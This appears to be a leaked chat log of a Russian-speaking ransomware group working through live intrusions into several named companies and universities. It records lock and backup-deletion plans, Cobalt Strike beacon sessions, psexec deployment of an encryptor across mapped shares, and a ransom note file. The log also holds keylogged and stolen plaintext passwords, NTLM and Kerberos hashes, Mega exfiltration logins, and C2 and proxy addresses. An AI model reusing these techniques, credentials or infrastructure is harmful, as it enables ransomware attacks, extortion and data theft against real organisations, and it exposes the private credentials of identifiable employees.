``или если дропнуть кобу у вас будет впнсразу запустить билдчтобы если палево начнется (будете мониторить админов)и вы уже будете дежрать сессии на серверах к этому временипоэтому мы прокинем впн в сетьшанс есть)я же сказалне турнут ли нас сразу после письма насчёт нимблов?вопросы?все 5 человек в деле, между собой распределите роливсе по таймингу, надо сделать практически мгновенно всене забывайте про удаление всех внешних бэков которые былина случай если дропнут кобут е вы запускаете на тачке длл, я выдаю вам овпн конфиги + дедик, вы все поднимаете и вот впном в сети2 входные точкина этот случай я готовлю вам впн мосты в сетьважный момент что во время шухера кобу могут выкинуть из сетиа, да, оки мапить даже не придется)армы вы можете расшарить по сетипоэтому тут тайминг очень важенно может подняться шухер и у нас будет мало времени на сам лок[ ](https://mediaeveryone.com/group/waterway-com?msg=idpvE2JA95NfNYsao) + замапленые армы?или лочим без нимблаи лочимлибо мы получаем пасс от нимбла и делаем ремув всех бэкаповтут все просточтобы вы только запустили билдк этому времени у вас должны быть притянуты все сервера в кобуполучили доступы сразу вошли заскринили бэкапы с размером файлов если он имется и удали все что можно``
WWDC2
WWDC1
MSSQL--
PDIPRODWEB
PDIPRODSQL
PDITESTSQL
WWSQL
WWSQL2
WWSQL02
REPORTING
WWSQLOLD
WWSQL2OLD
TERMSRV--
PDITESTWEB
WATERWAYDSC02
WW2K1OLD
PDIPRODWEB2016
WW2K1
Hyper-V Server--
WWHV-CLUSTER-1
WWHV-CLUSTER-2
WWHV01
WWHV02
WWHV03
WWHV04
WWHV63
``и ждете доступы чтобы сделать все за +- 1-2 минутыт е сокс + урл вбитвы готовите сразу доступы в нимблу``
по AD
всего тачек- 310
win serv - 16
hyper-v server - 7
arm - 287
``из тех двух что я скидывалсразу сюда билд дайте одинсколько серверов и пользовательских?окей разбираем стратегиюу тайм аут 30 минутя виделдаdjarden у нее же браузер чекали?mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=eYrHKvzmgSGPvEQs7) чей деск?`MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!` всё работает, не путай меня`MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6*`на ней кейлог виситдау нее тачку смотрели же?``
dn:CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>nc: Dianne Jarden
>sn: Jarden
>description: IT
````MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!`сейчас найду валидныеошибкаMS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915ITMan2179! пишет ошибку``
blue
gkeller
mharper
mpusatera
```у кого был нимбл?``
mail.datotel.com\tweiskopf@waterway.com Weiskopf2583#
mail.datotel.com\customercare@waterway.com Wc#2020!
``````
MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!
MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6*
MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!
MS.Outlook.15:mharper@waterway.com\mharper@waterway.com LoveUnit14
MS.Outlook.15:mpusatera@waterway.com\mpusatera@waterway.com Gators1853
MS.Outlook.15:tweiskopf@waterway.com\tweiskopf@waterway.com Weiskopf2583*
``@user7 долго еще?мне нужна его почта и почта второго пиздюкатам тикеты на помощь создаются или типо тогоя думаю это HelpDesc*негово всяком случае дёрнул у неоэто mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=ERNTLyZqow7H3bsNB) не думаю что он живой человекони в основном у @user7
он отошёл``
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```setg Proxies socks4:185.150.189.165:29528дайте пока сокс и доступы для подкл к почтам ребят по нимблув слэке?на почте тихо?в кейлоге ниче нетну если только они по офису бегают и орутне подняли ли шухерадминов помониторьтекак веб так и ссхер там а не брут
в лок улетает ip после +- 10 попытоккак и рутв логиныадмины еще с большой буквыв батник прелоковый вкиньте кил процесса асус бэкап сервисачерез час обсуждаем план действий т к тут подход не тривиальныйда[ ](https://mediaeveryone.com/group/waterway-com?msg=oo9XiRA9tCdeANuK8) небыло еще
сделаем в ближайщее времятут еще был архивчик с файлами?начинаем в 1:30https://192.168.0.75/#/loginна почтея видел только алерт об успешной авторизации за 20-й годтак вы и до этого были алерты?вообще перед брутом вопрос
у них при входе алерт на почту
есть большая вероятность что и на перебор\лок\неверный пас так же будет алерт
стоит ли?
mega.nz
WATERWAY.COM SQL .bak
ztclmgplmwfqmcjqfn@wqcefp.com
745jkiJIGSFjer67
WATERWAY.COM outlook
ribom53736@vy89.com
Mdu7IJ8wQ5ktG3HS4Vzuase1314212
``админ администратор и рутлогины этих двух утапковдумаю макс диап 5 вариантовне ясно какой из вариантов логина нужентак проблема ещё в том что я пробовал с разными вариациями логина (с @ \ и просто логин)давайте вернемся к идее брутаговорят что в мониторинге видно что они вг, как и насытак может он вг тогда?)в ад_комп не видатьв ad_computers есть?@user9
```
нимблы:
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
``он разве есть в АД как таковой? нимбл в домене?возможно и неограниченно с другой стороны, сколько попыток логина мы делали на нимблы привязаны к адно по известнымэто в доменеэто на нимбле?``
Lockout threshold: 15
``там неограниченное количество попыток?+ все хеши с домена и побрутимдавайте соберем топ паролей за последние пару летдаже 16вообще в ад и на сервах дикая мусоркаад сняли как сетку далитак и было, по ад17 серверов? а раньше столько и было? или они чет пронюхали?по бэкапам
в сети все компы с "backup" либо не пигуются, либо анричибл
Несколько что живы - только с диском С и там нет бэкапов
Всего 17 сервером, из бэкапов нашел только бэкапы баз,сайт и тд
Чекну конечно еще воркгруп, но такое ощущение что они льют бэкапы в нимбл
либо вобще их не делают :) что вряд ли, т.к компы с припиской бэкап создают впечатление что они восстановлены из бэкапа, поэтому так и называютсятак и спалитесь)```
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:11:21> portscan 192.168.0.105 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on 192.168.0.105
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:09:54> shell net view \\192.168.0.105 /all
[*] Tasked beacon to run: net view \\192.168.0.105 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
```нет вью не работает, 3389 нет, другие порты не смотрелрдп?``
Description = The RPC server is unavailable.
``а что с рпс и нет вью?бэкапы без 445``
beacon> shell ping -n 1 CLEBACKUP.waterway.com
[*] Tasked beacon to run: ping -n 1 CLEBACKUP.waterway.com
[+] host called home, sent: 75 bytes
[+] received output:
Pinging CLEBACKUP.waterway.com [192.168.0.105] with 32 bytes of data:
Reply from 192.168.0.105: bytes=32 time=7ms TTL=64
Ping statistics for 192.168.0.105:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 7ms, Maximum = 7ms, Average = 7ms
beacon> portscan 192.168.0.105 445,21,22,3389,443
[*] Tasked beacon to scan ports 445,21,22,3389,443 on 192.168.0.105
[+] host called home, sent: 75377 bytes
[+] received output:
(ICMP) Target '192.168.0.105' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
``чекстати
очень интересная штука....но чет не компилится
роюсь к кодеесть вот эта штука в теории должна работать - https://github.com/amitwaisel/Malproxy/tree/master/srcв лабе патченый)
попробовал мимик через сокс и он ожидаемо не сработал
впн не развернуть - кобальтовский не деплоится т.к. вин 10 не поддерживается.
Любой другой впн клиент они не используют.так что попробовать да имет смыслкстати на лабе насколько я помню ДК не патченныйно надо быть полностью увереным что сработает)в принципе можно попробовать это на лабенеа, не пробовал
если сейчас попробую, то будет большой шанс что уже почистят сеть, т.к. если сейчас это не выйдет и второй раз сломается дк - админы что нибудь да заподозрят)``
вот эта строка не работает походу потому что в CS старый мимик
```
а через сокс или впн не пробоват ак завести?по смбгост по сети - пустоОсталось наполнитьПоднял формум, настроил.и завтра к 11отпишите результат работы за сегодня в групымаксимум к 11 можемВсе стоит ехать 1:30Это очень плохое времяа че так рано?завтра к 10до 9сегодня не долгодвигаюсь по компамкак у вас продвигается?сканирую подсети из ad_subnets - ищу где я админчитаю документацию по пш эмпайруотпишите прогресс по задачамсдела че яну как раз будем разбиратсья с тобойполучается такитого только @user8 свободен?я с той же сессиейну раз то окподнимаю фопруму меня asu.eduостальные?видимо, лично у меня пока задачи нетзакончил с впс буквально пару минут назад, по сеткам отписывалчто у вас по задачам?:space_invader:приветвсем приветhi$krb5tgs$23$*Adm-LarsonJa$na.kfy.com$MSSQLSvc/kfi-tfs-01.na.kfy.com 12!Password8eyJhbGciOiJBbRHP0ziz/Of8VMpJoSrB/hdylxGRaD3OpMObBmsS/MPYEu2f+hshrf+Hn2STXGSY/Kdw9lDFIjH++fPGQdYq4VU07fksbbn1xAo83C4krZ6y9YVhj/VYZBydpiCylnlR9wZPij8ju8L94iEv/deJz1hL9N8nlotdZm978lYB24DvXLWkZUu/lMzoA2ZIWTbcg6HyUPbT9DfrX8acmthalXQ1fSYeoX84fdMD+u3UOtkzzCK323IPcekXELFSCa3VeyJhbGciOiJB3XBKfH829UQBLt+p1JFtDtq6HXaZVNbfVvjWcSjVxWxy9i9h2Tqs+7xmLExTnnah80/tWlzVz+931Ljyrmc1ZG/5rlZxyNkna6P98YPxD6FGeBeN68vi3sFPuuBEsWDvEKJXhNusSBlvbK4Eyzh83mFlH9l5LTobXSlcoAk0+Zc=`[22][ssh] host: 89.0.10.104 login: root password: netgear1`
это который NAS-D5-E2-B8только щас)я во всехзайди в другой рока поняла мы кейлоггами их ловими через СИ залететь на нимблбудут звонить писать в водунимбл?в 4 будет нимблтам не раньше 6ладно ты прав, но я добавлю что когда говорил про ехе я закладывал подобные исходы)я не виноват что трик умет дл жрать)не бей лежачего)))))а как же отказ от ехе и нахуй егокак так...ага понял, маякни пожалуйста как там грузить будут - у меня тут перебои с кейсами для онлайников сегодня( им работать не с чем( вот думал с трика взять че-нить а чистого ехе то нету....еще на той неделе договаривались и сегодня уточнялтаргет сказал что будет да?прогруз, откуда хзя читал сегодня какие-то новые кейсы будут? с бк будут грузить?как вы там?приветпривет``
LEEFILTERS.UK
=============
Domain Controllers
LEEPDCVM
LEE-DCON-01
-------------------
Sage/SQL
LEESQL
LEESAGEVM
LEEAPPVM
-------------------
backup server
LEESTORE
-------------------
Qlikview Server
(Qlik provides an end-to-end platform which includes data integration, user-driven business intelligence and conversational analytics)
LEEQLIKVM
QVWEBLIVE
QVAPPLIVE
QVAPPTEST
LEEPUBAPP01
-------------------
EXCHANGE
LEEMAILVM
-------------------
File Storage Server
LEEDATA
-------------------
Replication Server
LEEREP
```пока поиграйтесь с тестированием инструментов пожалуйстаизвините друзья, сессиями пока ступор небольшой, наверное через пару часов решится мб раньшевот бы новых сессий дали (оксейчас постараюсь намутить, бекдор отвалился просто
домен куда отстук былвсе мертвы которые живы были?доброй ночиДобрый вечердобрый деньСессий нет. Новые будут?доброе утро:flag_il:Hiспокойнойвсем спокойной``
https://vpn.floridapoly.edu
```
на дедике под впном
чекнул сеть на ms17\bluekeep\smbghost(выборочно) - все мимо
остался еще варик как-то узнать ДК и проверить его на зерологонпоэтому будем до позднабудем закрывать сетьзавтра к 3отпишите статусы в групынесколько версий пробовал ms17
не канаетПо моей - просканил сеть
есть 1 ```
Host is likely VULNERABLE to MS17-010!
```
но
```
[-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
``отпишите статус в групысделал только 2 снапшотакто закончил рдп отпишите пасс и что можно делать снапшот@tl1 добавь меня к @user4 в группу пожайлустаЖду пока востановишь работу дедика, пакую все данные keepass,а как мне сделать чтобы по 9000 с впном можно было подлкючаться?)
как вчерав дедике копаюсь, впн вчерашней сети разворачиваюкто чем занят?это по настройке рдпне создавайте новых пользователей, меняйте пасс и работайте под текущимне меньшеок, от 2424 мало? а то уже поставилновый пароль минимум от 30 символов, включая буквы цифры и символыу @user4 сеть почти разобрана, надо сегодня с ней закончить. 2 человека ему в помощь будут выделены, там сеть достаточно большаяпоэтому скорее всего сегодня ожидаются сесисразу проверьте настройки питания на ОС чтобы не уходило в сонтогда 10его через месяц не будетя на старомеще 2 человека?3,7,8 скинулможно тот оставить что естьну пусть будет 10любоймне 16все на местенапиши какой дедик хотите (10,16)
я выдаю вам доступы в лс
вы настраивайте под себя, ставите софт и меняет пароль от учетки
скидываете новый пароль учетки мне
я делаю вам снапшот текущего состояния для возможности отката в настроеную стредукак раз уже всеа хотя не будем ждатьдем еще 7 минут остальныхэтот да199.241.189.58 вроде живая - я про нееваши основые которые вам изначально давали остались2 уже забрал которые временные выдавала которая уже есть, е можно оставить?3 вин 10 и 3 вин 16рдп подъехалинет ещевсе пришли?hiдень добрыйвсем привет:space_invader:+ ты снимал с них керб?)тогда другой вопрос: а можно файлы АД трастов для начала?мне определенно стало нравиться как ты пишешь отчет о проделанной работе)в трастовых доменах через
```
smb_version
rhosts="имя_домена"
```
обнаружили чуть больше тачек, чем 1
Тут `mcklrh.mig`:
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
[+] 192.168.254.107:445 - Host is running Windows 2003 R2 SP1 (build:3790) (name:NSERV4) (domain:MCKLRH)
```
Тут `ffmg.local`:
```
[+] 10.10.39.73:445 - Host is running Windows 2003 SP2 (build:3790) (name:CLINICDC) (domain:FFMG)
```
Имеющийся ЕА (`svc-aadc`) не имеет админских прав в обоих доменах
```
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
```
[+] 10.10.39.73:445 - 10.10.39.73:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
Чекал на `ms17`:
Тут `ffmg.local` глухо
Тут `mcklrh.mig `на серваке 2003 уязвимость есть. Добавил ЛА, заспавнить ни в кобе, ни в тпш, ни в метерпретере не вышло.
Пытался снять АДинфо - не вышло. Давал либо 0 объектов, либо повисал, либо c ошибкой` ERROR: 0x1`
Пытался снимать и роняя экзешник, и удалённо через:
```
-b DC=mcklrh,DC=mig
-h 192.168.254.107
```
Нагрузки запускал через `wmic`, `psexec`, `ms17_010_command` - ни ху
Пока что есть только списки ДА и ЕА из домена `mcklrh.mig`
```
The request will be processed at a domain controller for domain mcklrh.mig.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator klr test3
testpacs
The command completed successfully.
```
```
The request will be processed at a domain controller for domain mcklrh.mig.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator ali
The command completed successfully.
```adfind.exe -f "(objectcategory=person)" -h x.x.x> ad_users.txt:thumbsup:чтобы не скучалиэто на случай неудачи по текущим сеткамuser4user7перекину сюда для удобства``
lrhc.local\gsnelson $Gateway56
lrhc.local\nmsapps dragon374
``````
Inbox - gkeller@waterway.com - Outlook
=======
inmbel
``````
Unit64OfficePC - [v. 7.00.21][#50200003524929] [0:00:03]
=======
ST0164[tab]ST0164
``````
https://192.168.63.1:8080/auth/login - Google Chrome
=======
b0ckTh15
admin
```
```
Zoom Meeting
=======
af[backspace]dmin[tab]bl0ckTh15
admin[tab]bl0ckTh15
```
```
Waterway 06 Office - [v. 7.00.21][#10100020974010] [0:00:48]
=======
06Blues
```
походу в зуме пароли передаются
```
New Tab - Google Chrome
=======
Where to find [a[backspace][backspace]password is [backspace][backspace]n zoom
192.168.64.1[left][left][backspace][backspace]63
```
```
Waterway Gas & Wash - Google Chrome
=======
mpusatera@waterway.com[tab]w@terwA[backspace]!y
w@terw@y
Morgan914
Gators1853
1853Gators
mpusatera@waterway.com[tab]w@terw@y
[F12][delete]
mpusatera@waterway.com[tab]w@terw@y
```с 26 до 5вообще планировалсь сегодня до 5с какого? до какого числа будем отдыхать?давайте постараемся и закроеп, я уже на новогодние хочу)мы и завтра вряд ли закроем))ещё собираю инфу по этому всему.тогда завтрасимантек на сервере с авторизацией
сессий с открытым симантеком нетсегодня вряд ли закроем
10 доменов
+ надо креды АВ и сферы где то ловить...https://www.solarwinds.com/it-security-management-toolsда вообще не ав вроде...?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) .злая хрень?вполнеsolarwinds говорит о чем то?отсалось бэкапы\сферавот же написанокак у вас тут дела?170.7.120.128пока ста выглядит так
+ это домен где мы есть
TECHNISTONE.LOCAL - не получается пролезть, нет пересечений и пользаков\групп из других доменов с правами
WI.RWP.COM какой-то дохлый домен, одни вин 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +
TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
POLYREY.COM Quarantined
RESOPAL.GER Quarantined
``списки серваков/армов со всех доменов.Herbst2018скиньте хэшик
```
c51ecc215ab741ba8eb53c323bc8c277
```.```
beacon> shell ping polyrey.com
[*] Tasked beacon to run: ping polyrey.com
[+] host called home, sent: 47 bytes
[+] received output:
Ping request could not find host polyrey.com. Please check the name and try again.
```
```
beacon> shell ping resopal.ger
[*] Tasked beacon to run: ping resopal.ger
[+] host called home, sent: 63 bytes
[+] received output:
Ping request could not find host resopal.ger. Please check the name and try again.
``````
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +
TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
POLYREY.COM Quarantined
RESOPAL.GER Quarantined
``тогда вариант со сканерамив общем они дохнут быстротак вот в них и не закрывали ничегоили по истечению пары дней с поднятым листенеромновые считаются до того как вы в ней сеть закрылиэто бывает когда базы быстро обновляютя почему кипиш то навел
вчера было две новых кобы и в эти две новых кобы ничего не летелода неужели)так, а в новую кобу то летит)с командами и прочимдайте еще сисинфо того сервера за дк и открыта ли у него внешка)) ага, две кобы было открыто, выбрал https, а он из другой кобы)на другую кобу что ли?)ты на какой собрал то?)у тебя графа листенеров пустаяневнимательность так сказатьесли что я это))на какой листенер поднял?)` *** 23623423 has joined.`я тоже в ахуе)лол)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=qWzDq9uNAzyugQTq7) то за дк был 2016в новой хоть кто нибудь новый листенер поднял?вот тот что был за дк тоже 12?длл из новой кобы - то же самоеи так и тактак вы же сказали что запускали на 1 сервере внутри сети через дк?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Gi5oBnXfNwZvCKHaY) из головного не видно, из другово виднона дк и запускали[ ](https://mediaeveryone.com/group/wilsonart-com?msg=2tfBQPqopYGz2bZyZ) да`resopal.lan`
```
beacon> shell dir \\172.22.198.11\C$
[*] Tasked beacon to run: dir \\172.22.198.11\C$
[+] host called home, sent: 53 bytes
[+] received output:
The trust relationship between the primary domain and the trusted domain failed.
```Или
regsvr32 file.dllЗапускать:
rundll32 file.dll, StartWдайте команду запуска длл Депатам где запускали за дк тоже был 12?даникакой сервер напрямую не видно?пытался, дл вроде работала на сервере из этого домена, но сессии небыло[ ](https://mediaeveryone.com/group/wilsonart-com?msg=zBMzgRhYxLtjfEr7S) через дк дальше пролезть?видитвнешку?вчера один скидывал в #toolspanelдайте еще сисинфо этих серверова я чисто тестирую исключаю варианты)я конечно попробую, но чисто мое мнение) что дело не в кобе а в том что наши дл не работают на этих 2012 дкпоробуйте сюдачистая коба``
108.62.12.143
https://askside.com
----------------------------------------------------------------------------------------
104.194.10.161:53256
KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi
```нету, только симантекзакрывать это уже отрубить везде АВ через админку и зайти спокойно, там помимо ав что естЬ? оно не всего показывает как АВ, может быть сканер или сенсоркак закрывать то его)чтобы в домен прооезть))везде отключена возможноть полного отлючения аввам для чего сессия?хотя есть риск что админы увидят обрыв с агентомнет правполностью отключить защиту и притянуть биндпайпом и поднять обратно?но я заметил что крашится дл только на 2012на тех что отработало
добавля в исключения и запускал после того как ав прошелся - сесия прилеталадлка от дэпа не удалятся но крашится
наша длл палилась, добавил в исключения, запускается и крашитсяпоследо того как по мнему ав прошелся?на нектороых дл запустилась после этого и сесия прилетелая добавлял дл в исключения авкак следствие крашскорее всего детектит шелкод и вырезает из длзашел по рдп
запустил дл
вылезло окно - прекрашена работа....как определи что именно крашится?но это рискованно и нужно сразу тогда все добиватькак альтернатива рубить симантек (он админится из головного домена)
и пробовать биндпайпом тянуть другие домены[ ](https://mediaeveryone.com/group/wilsonart-com?msg=KoqSvFWfFHfCdEq3Q) нам сейчас решать вопрос, иначе не закроем сегодня еевообщем вот трастмап
всего 14 доменов
в 4 есть сесии
в 7 есть доступы, но оттуда не летят сессии``
>description: Veeam Backup Server
>dNSHostName: bod01-bkp01.eu.Wilsonart.com
``````
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com
``````
>description: Veeam Backup Server
>dNSHostName: dcveeam01.Wilsonart.com
``````
>description: VMware vCenter 6.0 Server
>dNSHostName: dcwas79.Wilsonart.com
```
```
>dNSHostName: nas_signature.polyrey.net
``осталось вцентер-насы-прочееиз текущего домена ДА +/- проходит в остальныеостальное все готово?чуть позже решим вопросрубит симантекбилдпайп?и везде крашитсятам стоит 2012на всех дк что видны из 5 доменовна всех 2012?@tl1 наши дл крашатся на 2012 винде, включаю вчерашню от дэпаав не видит ихещё есть WI.RWP.COM, там вобще всё на 2003и арборайткрашится процес после запуска дллна uk и eu ДК на 2012, там чистые длки при запуске падаютсесии не тянутсявсё, что _NTLM, снималось удалённо, кроме wilsonart.comпара вроде в карантине, но пингуетсявсе куда надо пролезтьэто все активные?``
uk.Wilsonart.com
arborite.com
eu.Wilsonart.com
resopal.lan
polyrey.com
resopal.ger
``переходим на закрытиеpth polyrey.net\adm-cavailj 99f09cbd168ec7f38bf4981a884f082cВзаимновсем хороших выходыхв пн к часуфайлы удаляйтесеси в слиптак ну ладновполне стоит попробовать*вполнестоит пытаться мсф пробовать? разные нагрузки, порты
спрашиваю вдруг если что, время не тратить)@user3 уже несколько дней в нее долбитсяона сидит рядом с тобойестьа инфы как я понял по тпш нет?:#sisd-net оставим в другой деньсегодня до 12:skull:поэтому она уже сдохла)там отстук должен быть до 40 секунд11 минут пингнижнятам что типо ACADEMIC.NET должно бытьне вижу там твоюв тпш прилетела к user3 а что дальше то с ней делать?) как в кобу заспавнить?от usera(мне в птш ghbktntkf jn .pthf 9пробуюарма?а баольше нет вариков?значит скорее всего портне, он не кусачиймакафитам еще попробуюкакой ав?ща тут еще пару рдп есть:disappointed:нетунеазапустилзапуститпшвидимо ав режет, пробовал разные варианты кобальтовской нагрузки - сессия не прилетает
есть какие нибудь еще варианты сессию заполучить?или ав режет коннекткак вариант - там имется вайтлист по ИП на ТСП соединениеip кобы пингуетсяно процес висит а сесии нетв общем подведя черту не что там закрыт выходной трафик на 443 портда)
я не проверил..скопирован с русскоязычного ресурса?да и вижу там ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=INты используешь правило для фаерволаи если на то пошлоесли его там нет, значит софт на твоей тачке не имет софта который держит 443 открытымскорее всего там был веб сервересли в нетстате был 443 порт локальный открыталя 139 445 и т дт е отображает просто открытые портытут больше играет роль флаг -aнетстат -нникак, предположил
в нетстате его неткак ты определил что 443 закрыт?далеенет)вопрос про занятый порт актуален?иными словами текущая тачка через 57431 порт делает запрос на 172....195:443справа удаленный + порткак видишь слева это локал адрес и портэто шапка нетстата``
Active Connections
Proto Local Address Foreign Address State
```?то есть порт занятнетвоей кобы?ipвнешний[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ип 172. это что?Прочитал[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) прочитай последние 30 сообщенийне,ну надо сменить порт или перенаправить
сессия по 443 по идее не должна прилететьНа что?все ответили?давсе пришли?по смб линк445по смб, получается, тожея не пробовал, но вроде по 80-му можно поднять сессиюу меня подик я же зумерока ты не куришь?окей я подожду всехкурятскорее нет, чем данадолго они?я нахожусь в кабинете и вижу, что их нету меня у всех статус "в сети "некоторые отошли пока что@user8 за всех отвечает?не прилетит[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) этот[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) или этот[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) этотна какой из?у вас сложности с ответом на вопрос?вроде пока что да@user4 @user7 @user8 живы?```
Подскажите пожалуйста - если 443 порт закрыт, сессия не прилетит в кобу?
```
+ скрин нижея его процитируювопрос всем вышеу нас в команде 2 человека)не у нас домены https и порт указан 443
так что скорее вопрос что с этим делать если порт закрыт)какой?@all вам вопросПодскажите пожалуйста - если 443 порт закрыт, сессия не прилетит в кобу?`DJIFH*U(7g86S7eyiuhfsleg`выдам новый``
https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009
https://lab.devry.edu/vpn/index.html d40016842 Jackson3
https://lab.devry.edu/vpn/index.html d01677853 Lilly535
https://lab.devry.edu/vpn/index.html d01480444 aDv!9659
```
@user9 допагавозьмешь 2 в работу?естьа вообще если есть еще сети - можно мне``
https://vpn.floridapoly.edu
```
Рассканиваю сабнеты в поисках дк - проверить на зерологонтак, кто чем занят отпишите в групынетВ птш можно экзешники пихать в память как в кобе?у меня пока с дедиком проблемы - нет++?у всех работа есть*даВсе пришли?приветВсем приветдень добрый:space_invader:с такими файлами капец долго будет лол172.17.0.13
172.17.0.8
```
The network path was not found.
```
```
Lost = 4 (100% loss),
``долго будетда должен, часть примапленых дисков в китае лолпо сети долго будет файлы таскать, что б зашифроватьпроверь не умер ли процесс локерадолжен по идеон точно там на замапленных сам отработает?```
beacon> remote-exec psexec 10.10.20.131 C:\starter.exe
[*] Tasked beacon to run 'C:\starter.exe' on 10.10.20.131 via Service Control Manager
[+] host called home, sent: 2005 bytes
[-] Could not start service c122355 on 10.10.20.131: 5
``+на 1 т е на 1 замапленом?чет за последние полчаса у меня только на 1 отработало[ ](https://mediaeveryone.com/group/itc-us-com?msg=9oMDn23BwxRksJAqJ) и можно идтина серверах есть+и на всех серверах)ну теперь ждем как на всех замапленных появится запискавезде файл R3ADM3.txt
на серверах?получаетсявсёна примапленных пока тихо+норму остальных?топестьда ,kznm yf[eqетсьtncm``
10/21/2020 10:01 PM 717 R3ADM3.txt
```13просто кажется что вы больше 10 нацепили может не поехатьпоробуйте запустить билдесли все подключилидургие не мапятсядургих дисков кроме С нет нигде?мои тоже +[ ](https://mediaeveryone.com/group/itc-us-com?msg=hPjLWs4GnypjiiRGo) ```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK N: \\172.17.0.13\C$ Microsoft Windows Network
OK O: \\10.10.0.129\C$ Microsoft Windows Network
OK P: \\10.0.10.143\C$ Microsoft Windows Network
OK Q: \\10.0.10.83\C$ Microsoft Windows Network
OK R: \\10.0.10.163\C$ Microsoft Windows Network
OK S: \\10.0.10.129\C$ Microsoft Windows Network
OK T: \\172.17.0.8\C$ Microsoft Windows Network
OK U: \\10.10.20.126\C$ Microsoft Windows Network
OK V: \\10.0.10.111\C$ Microsoft Windows Network
OK W: \\10.10.20.131\C$ Microsoft Windows Network
OK X: \\10.10.0.135\C$ Microsoft Windows Network
OK Y: \\10.10.0.117\C$ Microsoft Windows Network
OK Z: \\10.0.10.116\C$ Microsoft Windows Network
The command completed successfully.
``````
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
```+и на этом всепо 10 штукможете их просто к текущим 5 серверам замапить``
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
```49а там сколько вс?[ ](https://mediaeveryone.com/group/itc-us-com?msg=BFy8ZYMKrwdTcqrGF) Мы на все вс раскидали в систем32 стартерыхоть какой то обхват на вс будетдаже нет юз на оставшиеся 5 серверова потом прибиваем дки потом запустите по класике деплой на всех пк через псектам не более 10 активных подкл на сколько помнювозьме часть вс на нет юз в этот сервер10.0.0.7он в кобе карсныйодин не трогали+на серверах*везде завелось?все, добиваем?4 дк не трогали + 1 серверкуда можно будет цепнуть те которые не завелисьоставьте в конце дк + 1 серверага нормна серверах вроде пошло
```
Size Type Last Modified Name
---- ---- ------------- ----
dir 10/13/2020 11:03:20 $Recycle.Bin
dir 10/21/2020 21:30:41 Config.Msi
dir 10/21/2020 21:30:40 Deskinfo
dir 07/14/2009 01:06:44 Documents and Settings
dir 10/21/2020 21:30:41 ECI
dir 10/21/2020 21:30:41 Godlan
dir 10/21/2020 21:30:40 inetpub
dir 10/21/2020 21:30:41 MultiLink
dir 10/21/2020 21:30:40 PerfLogs
dir 10/21/2020 21:30:41 Program Files
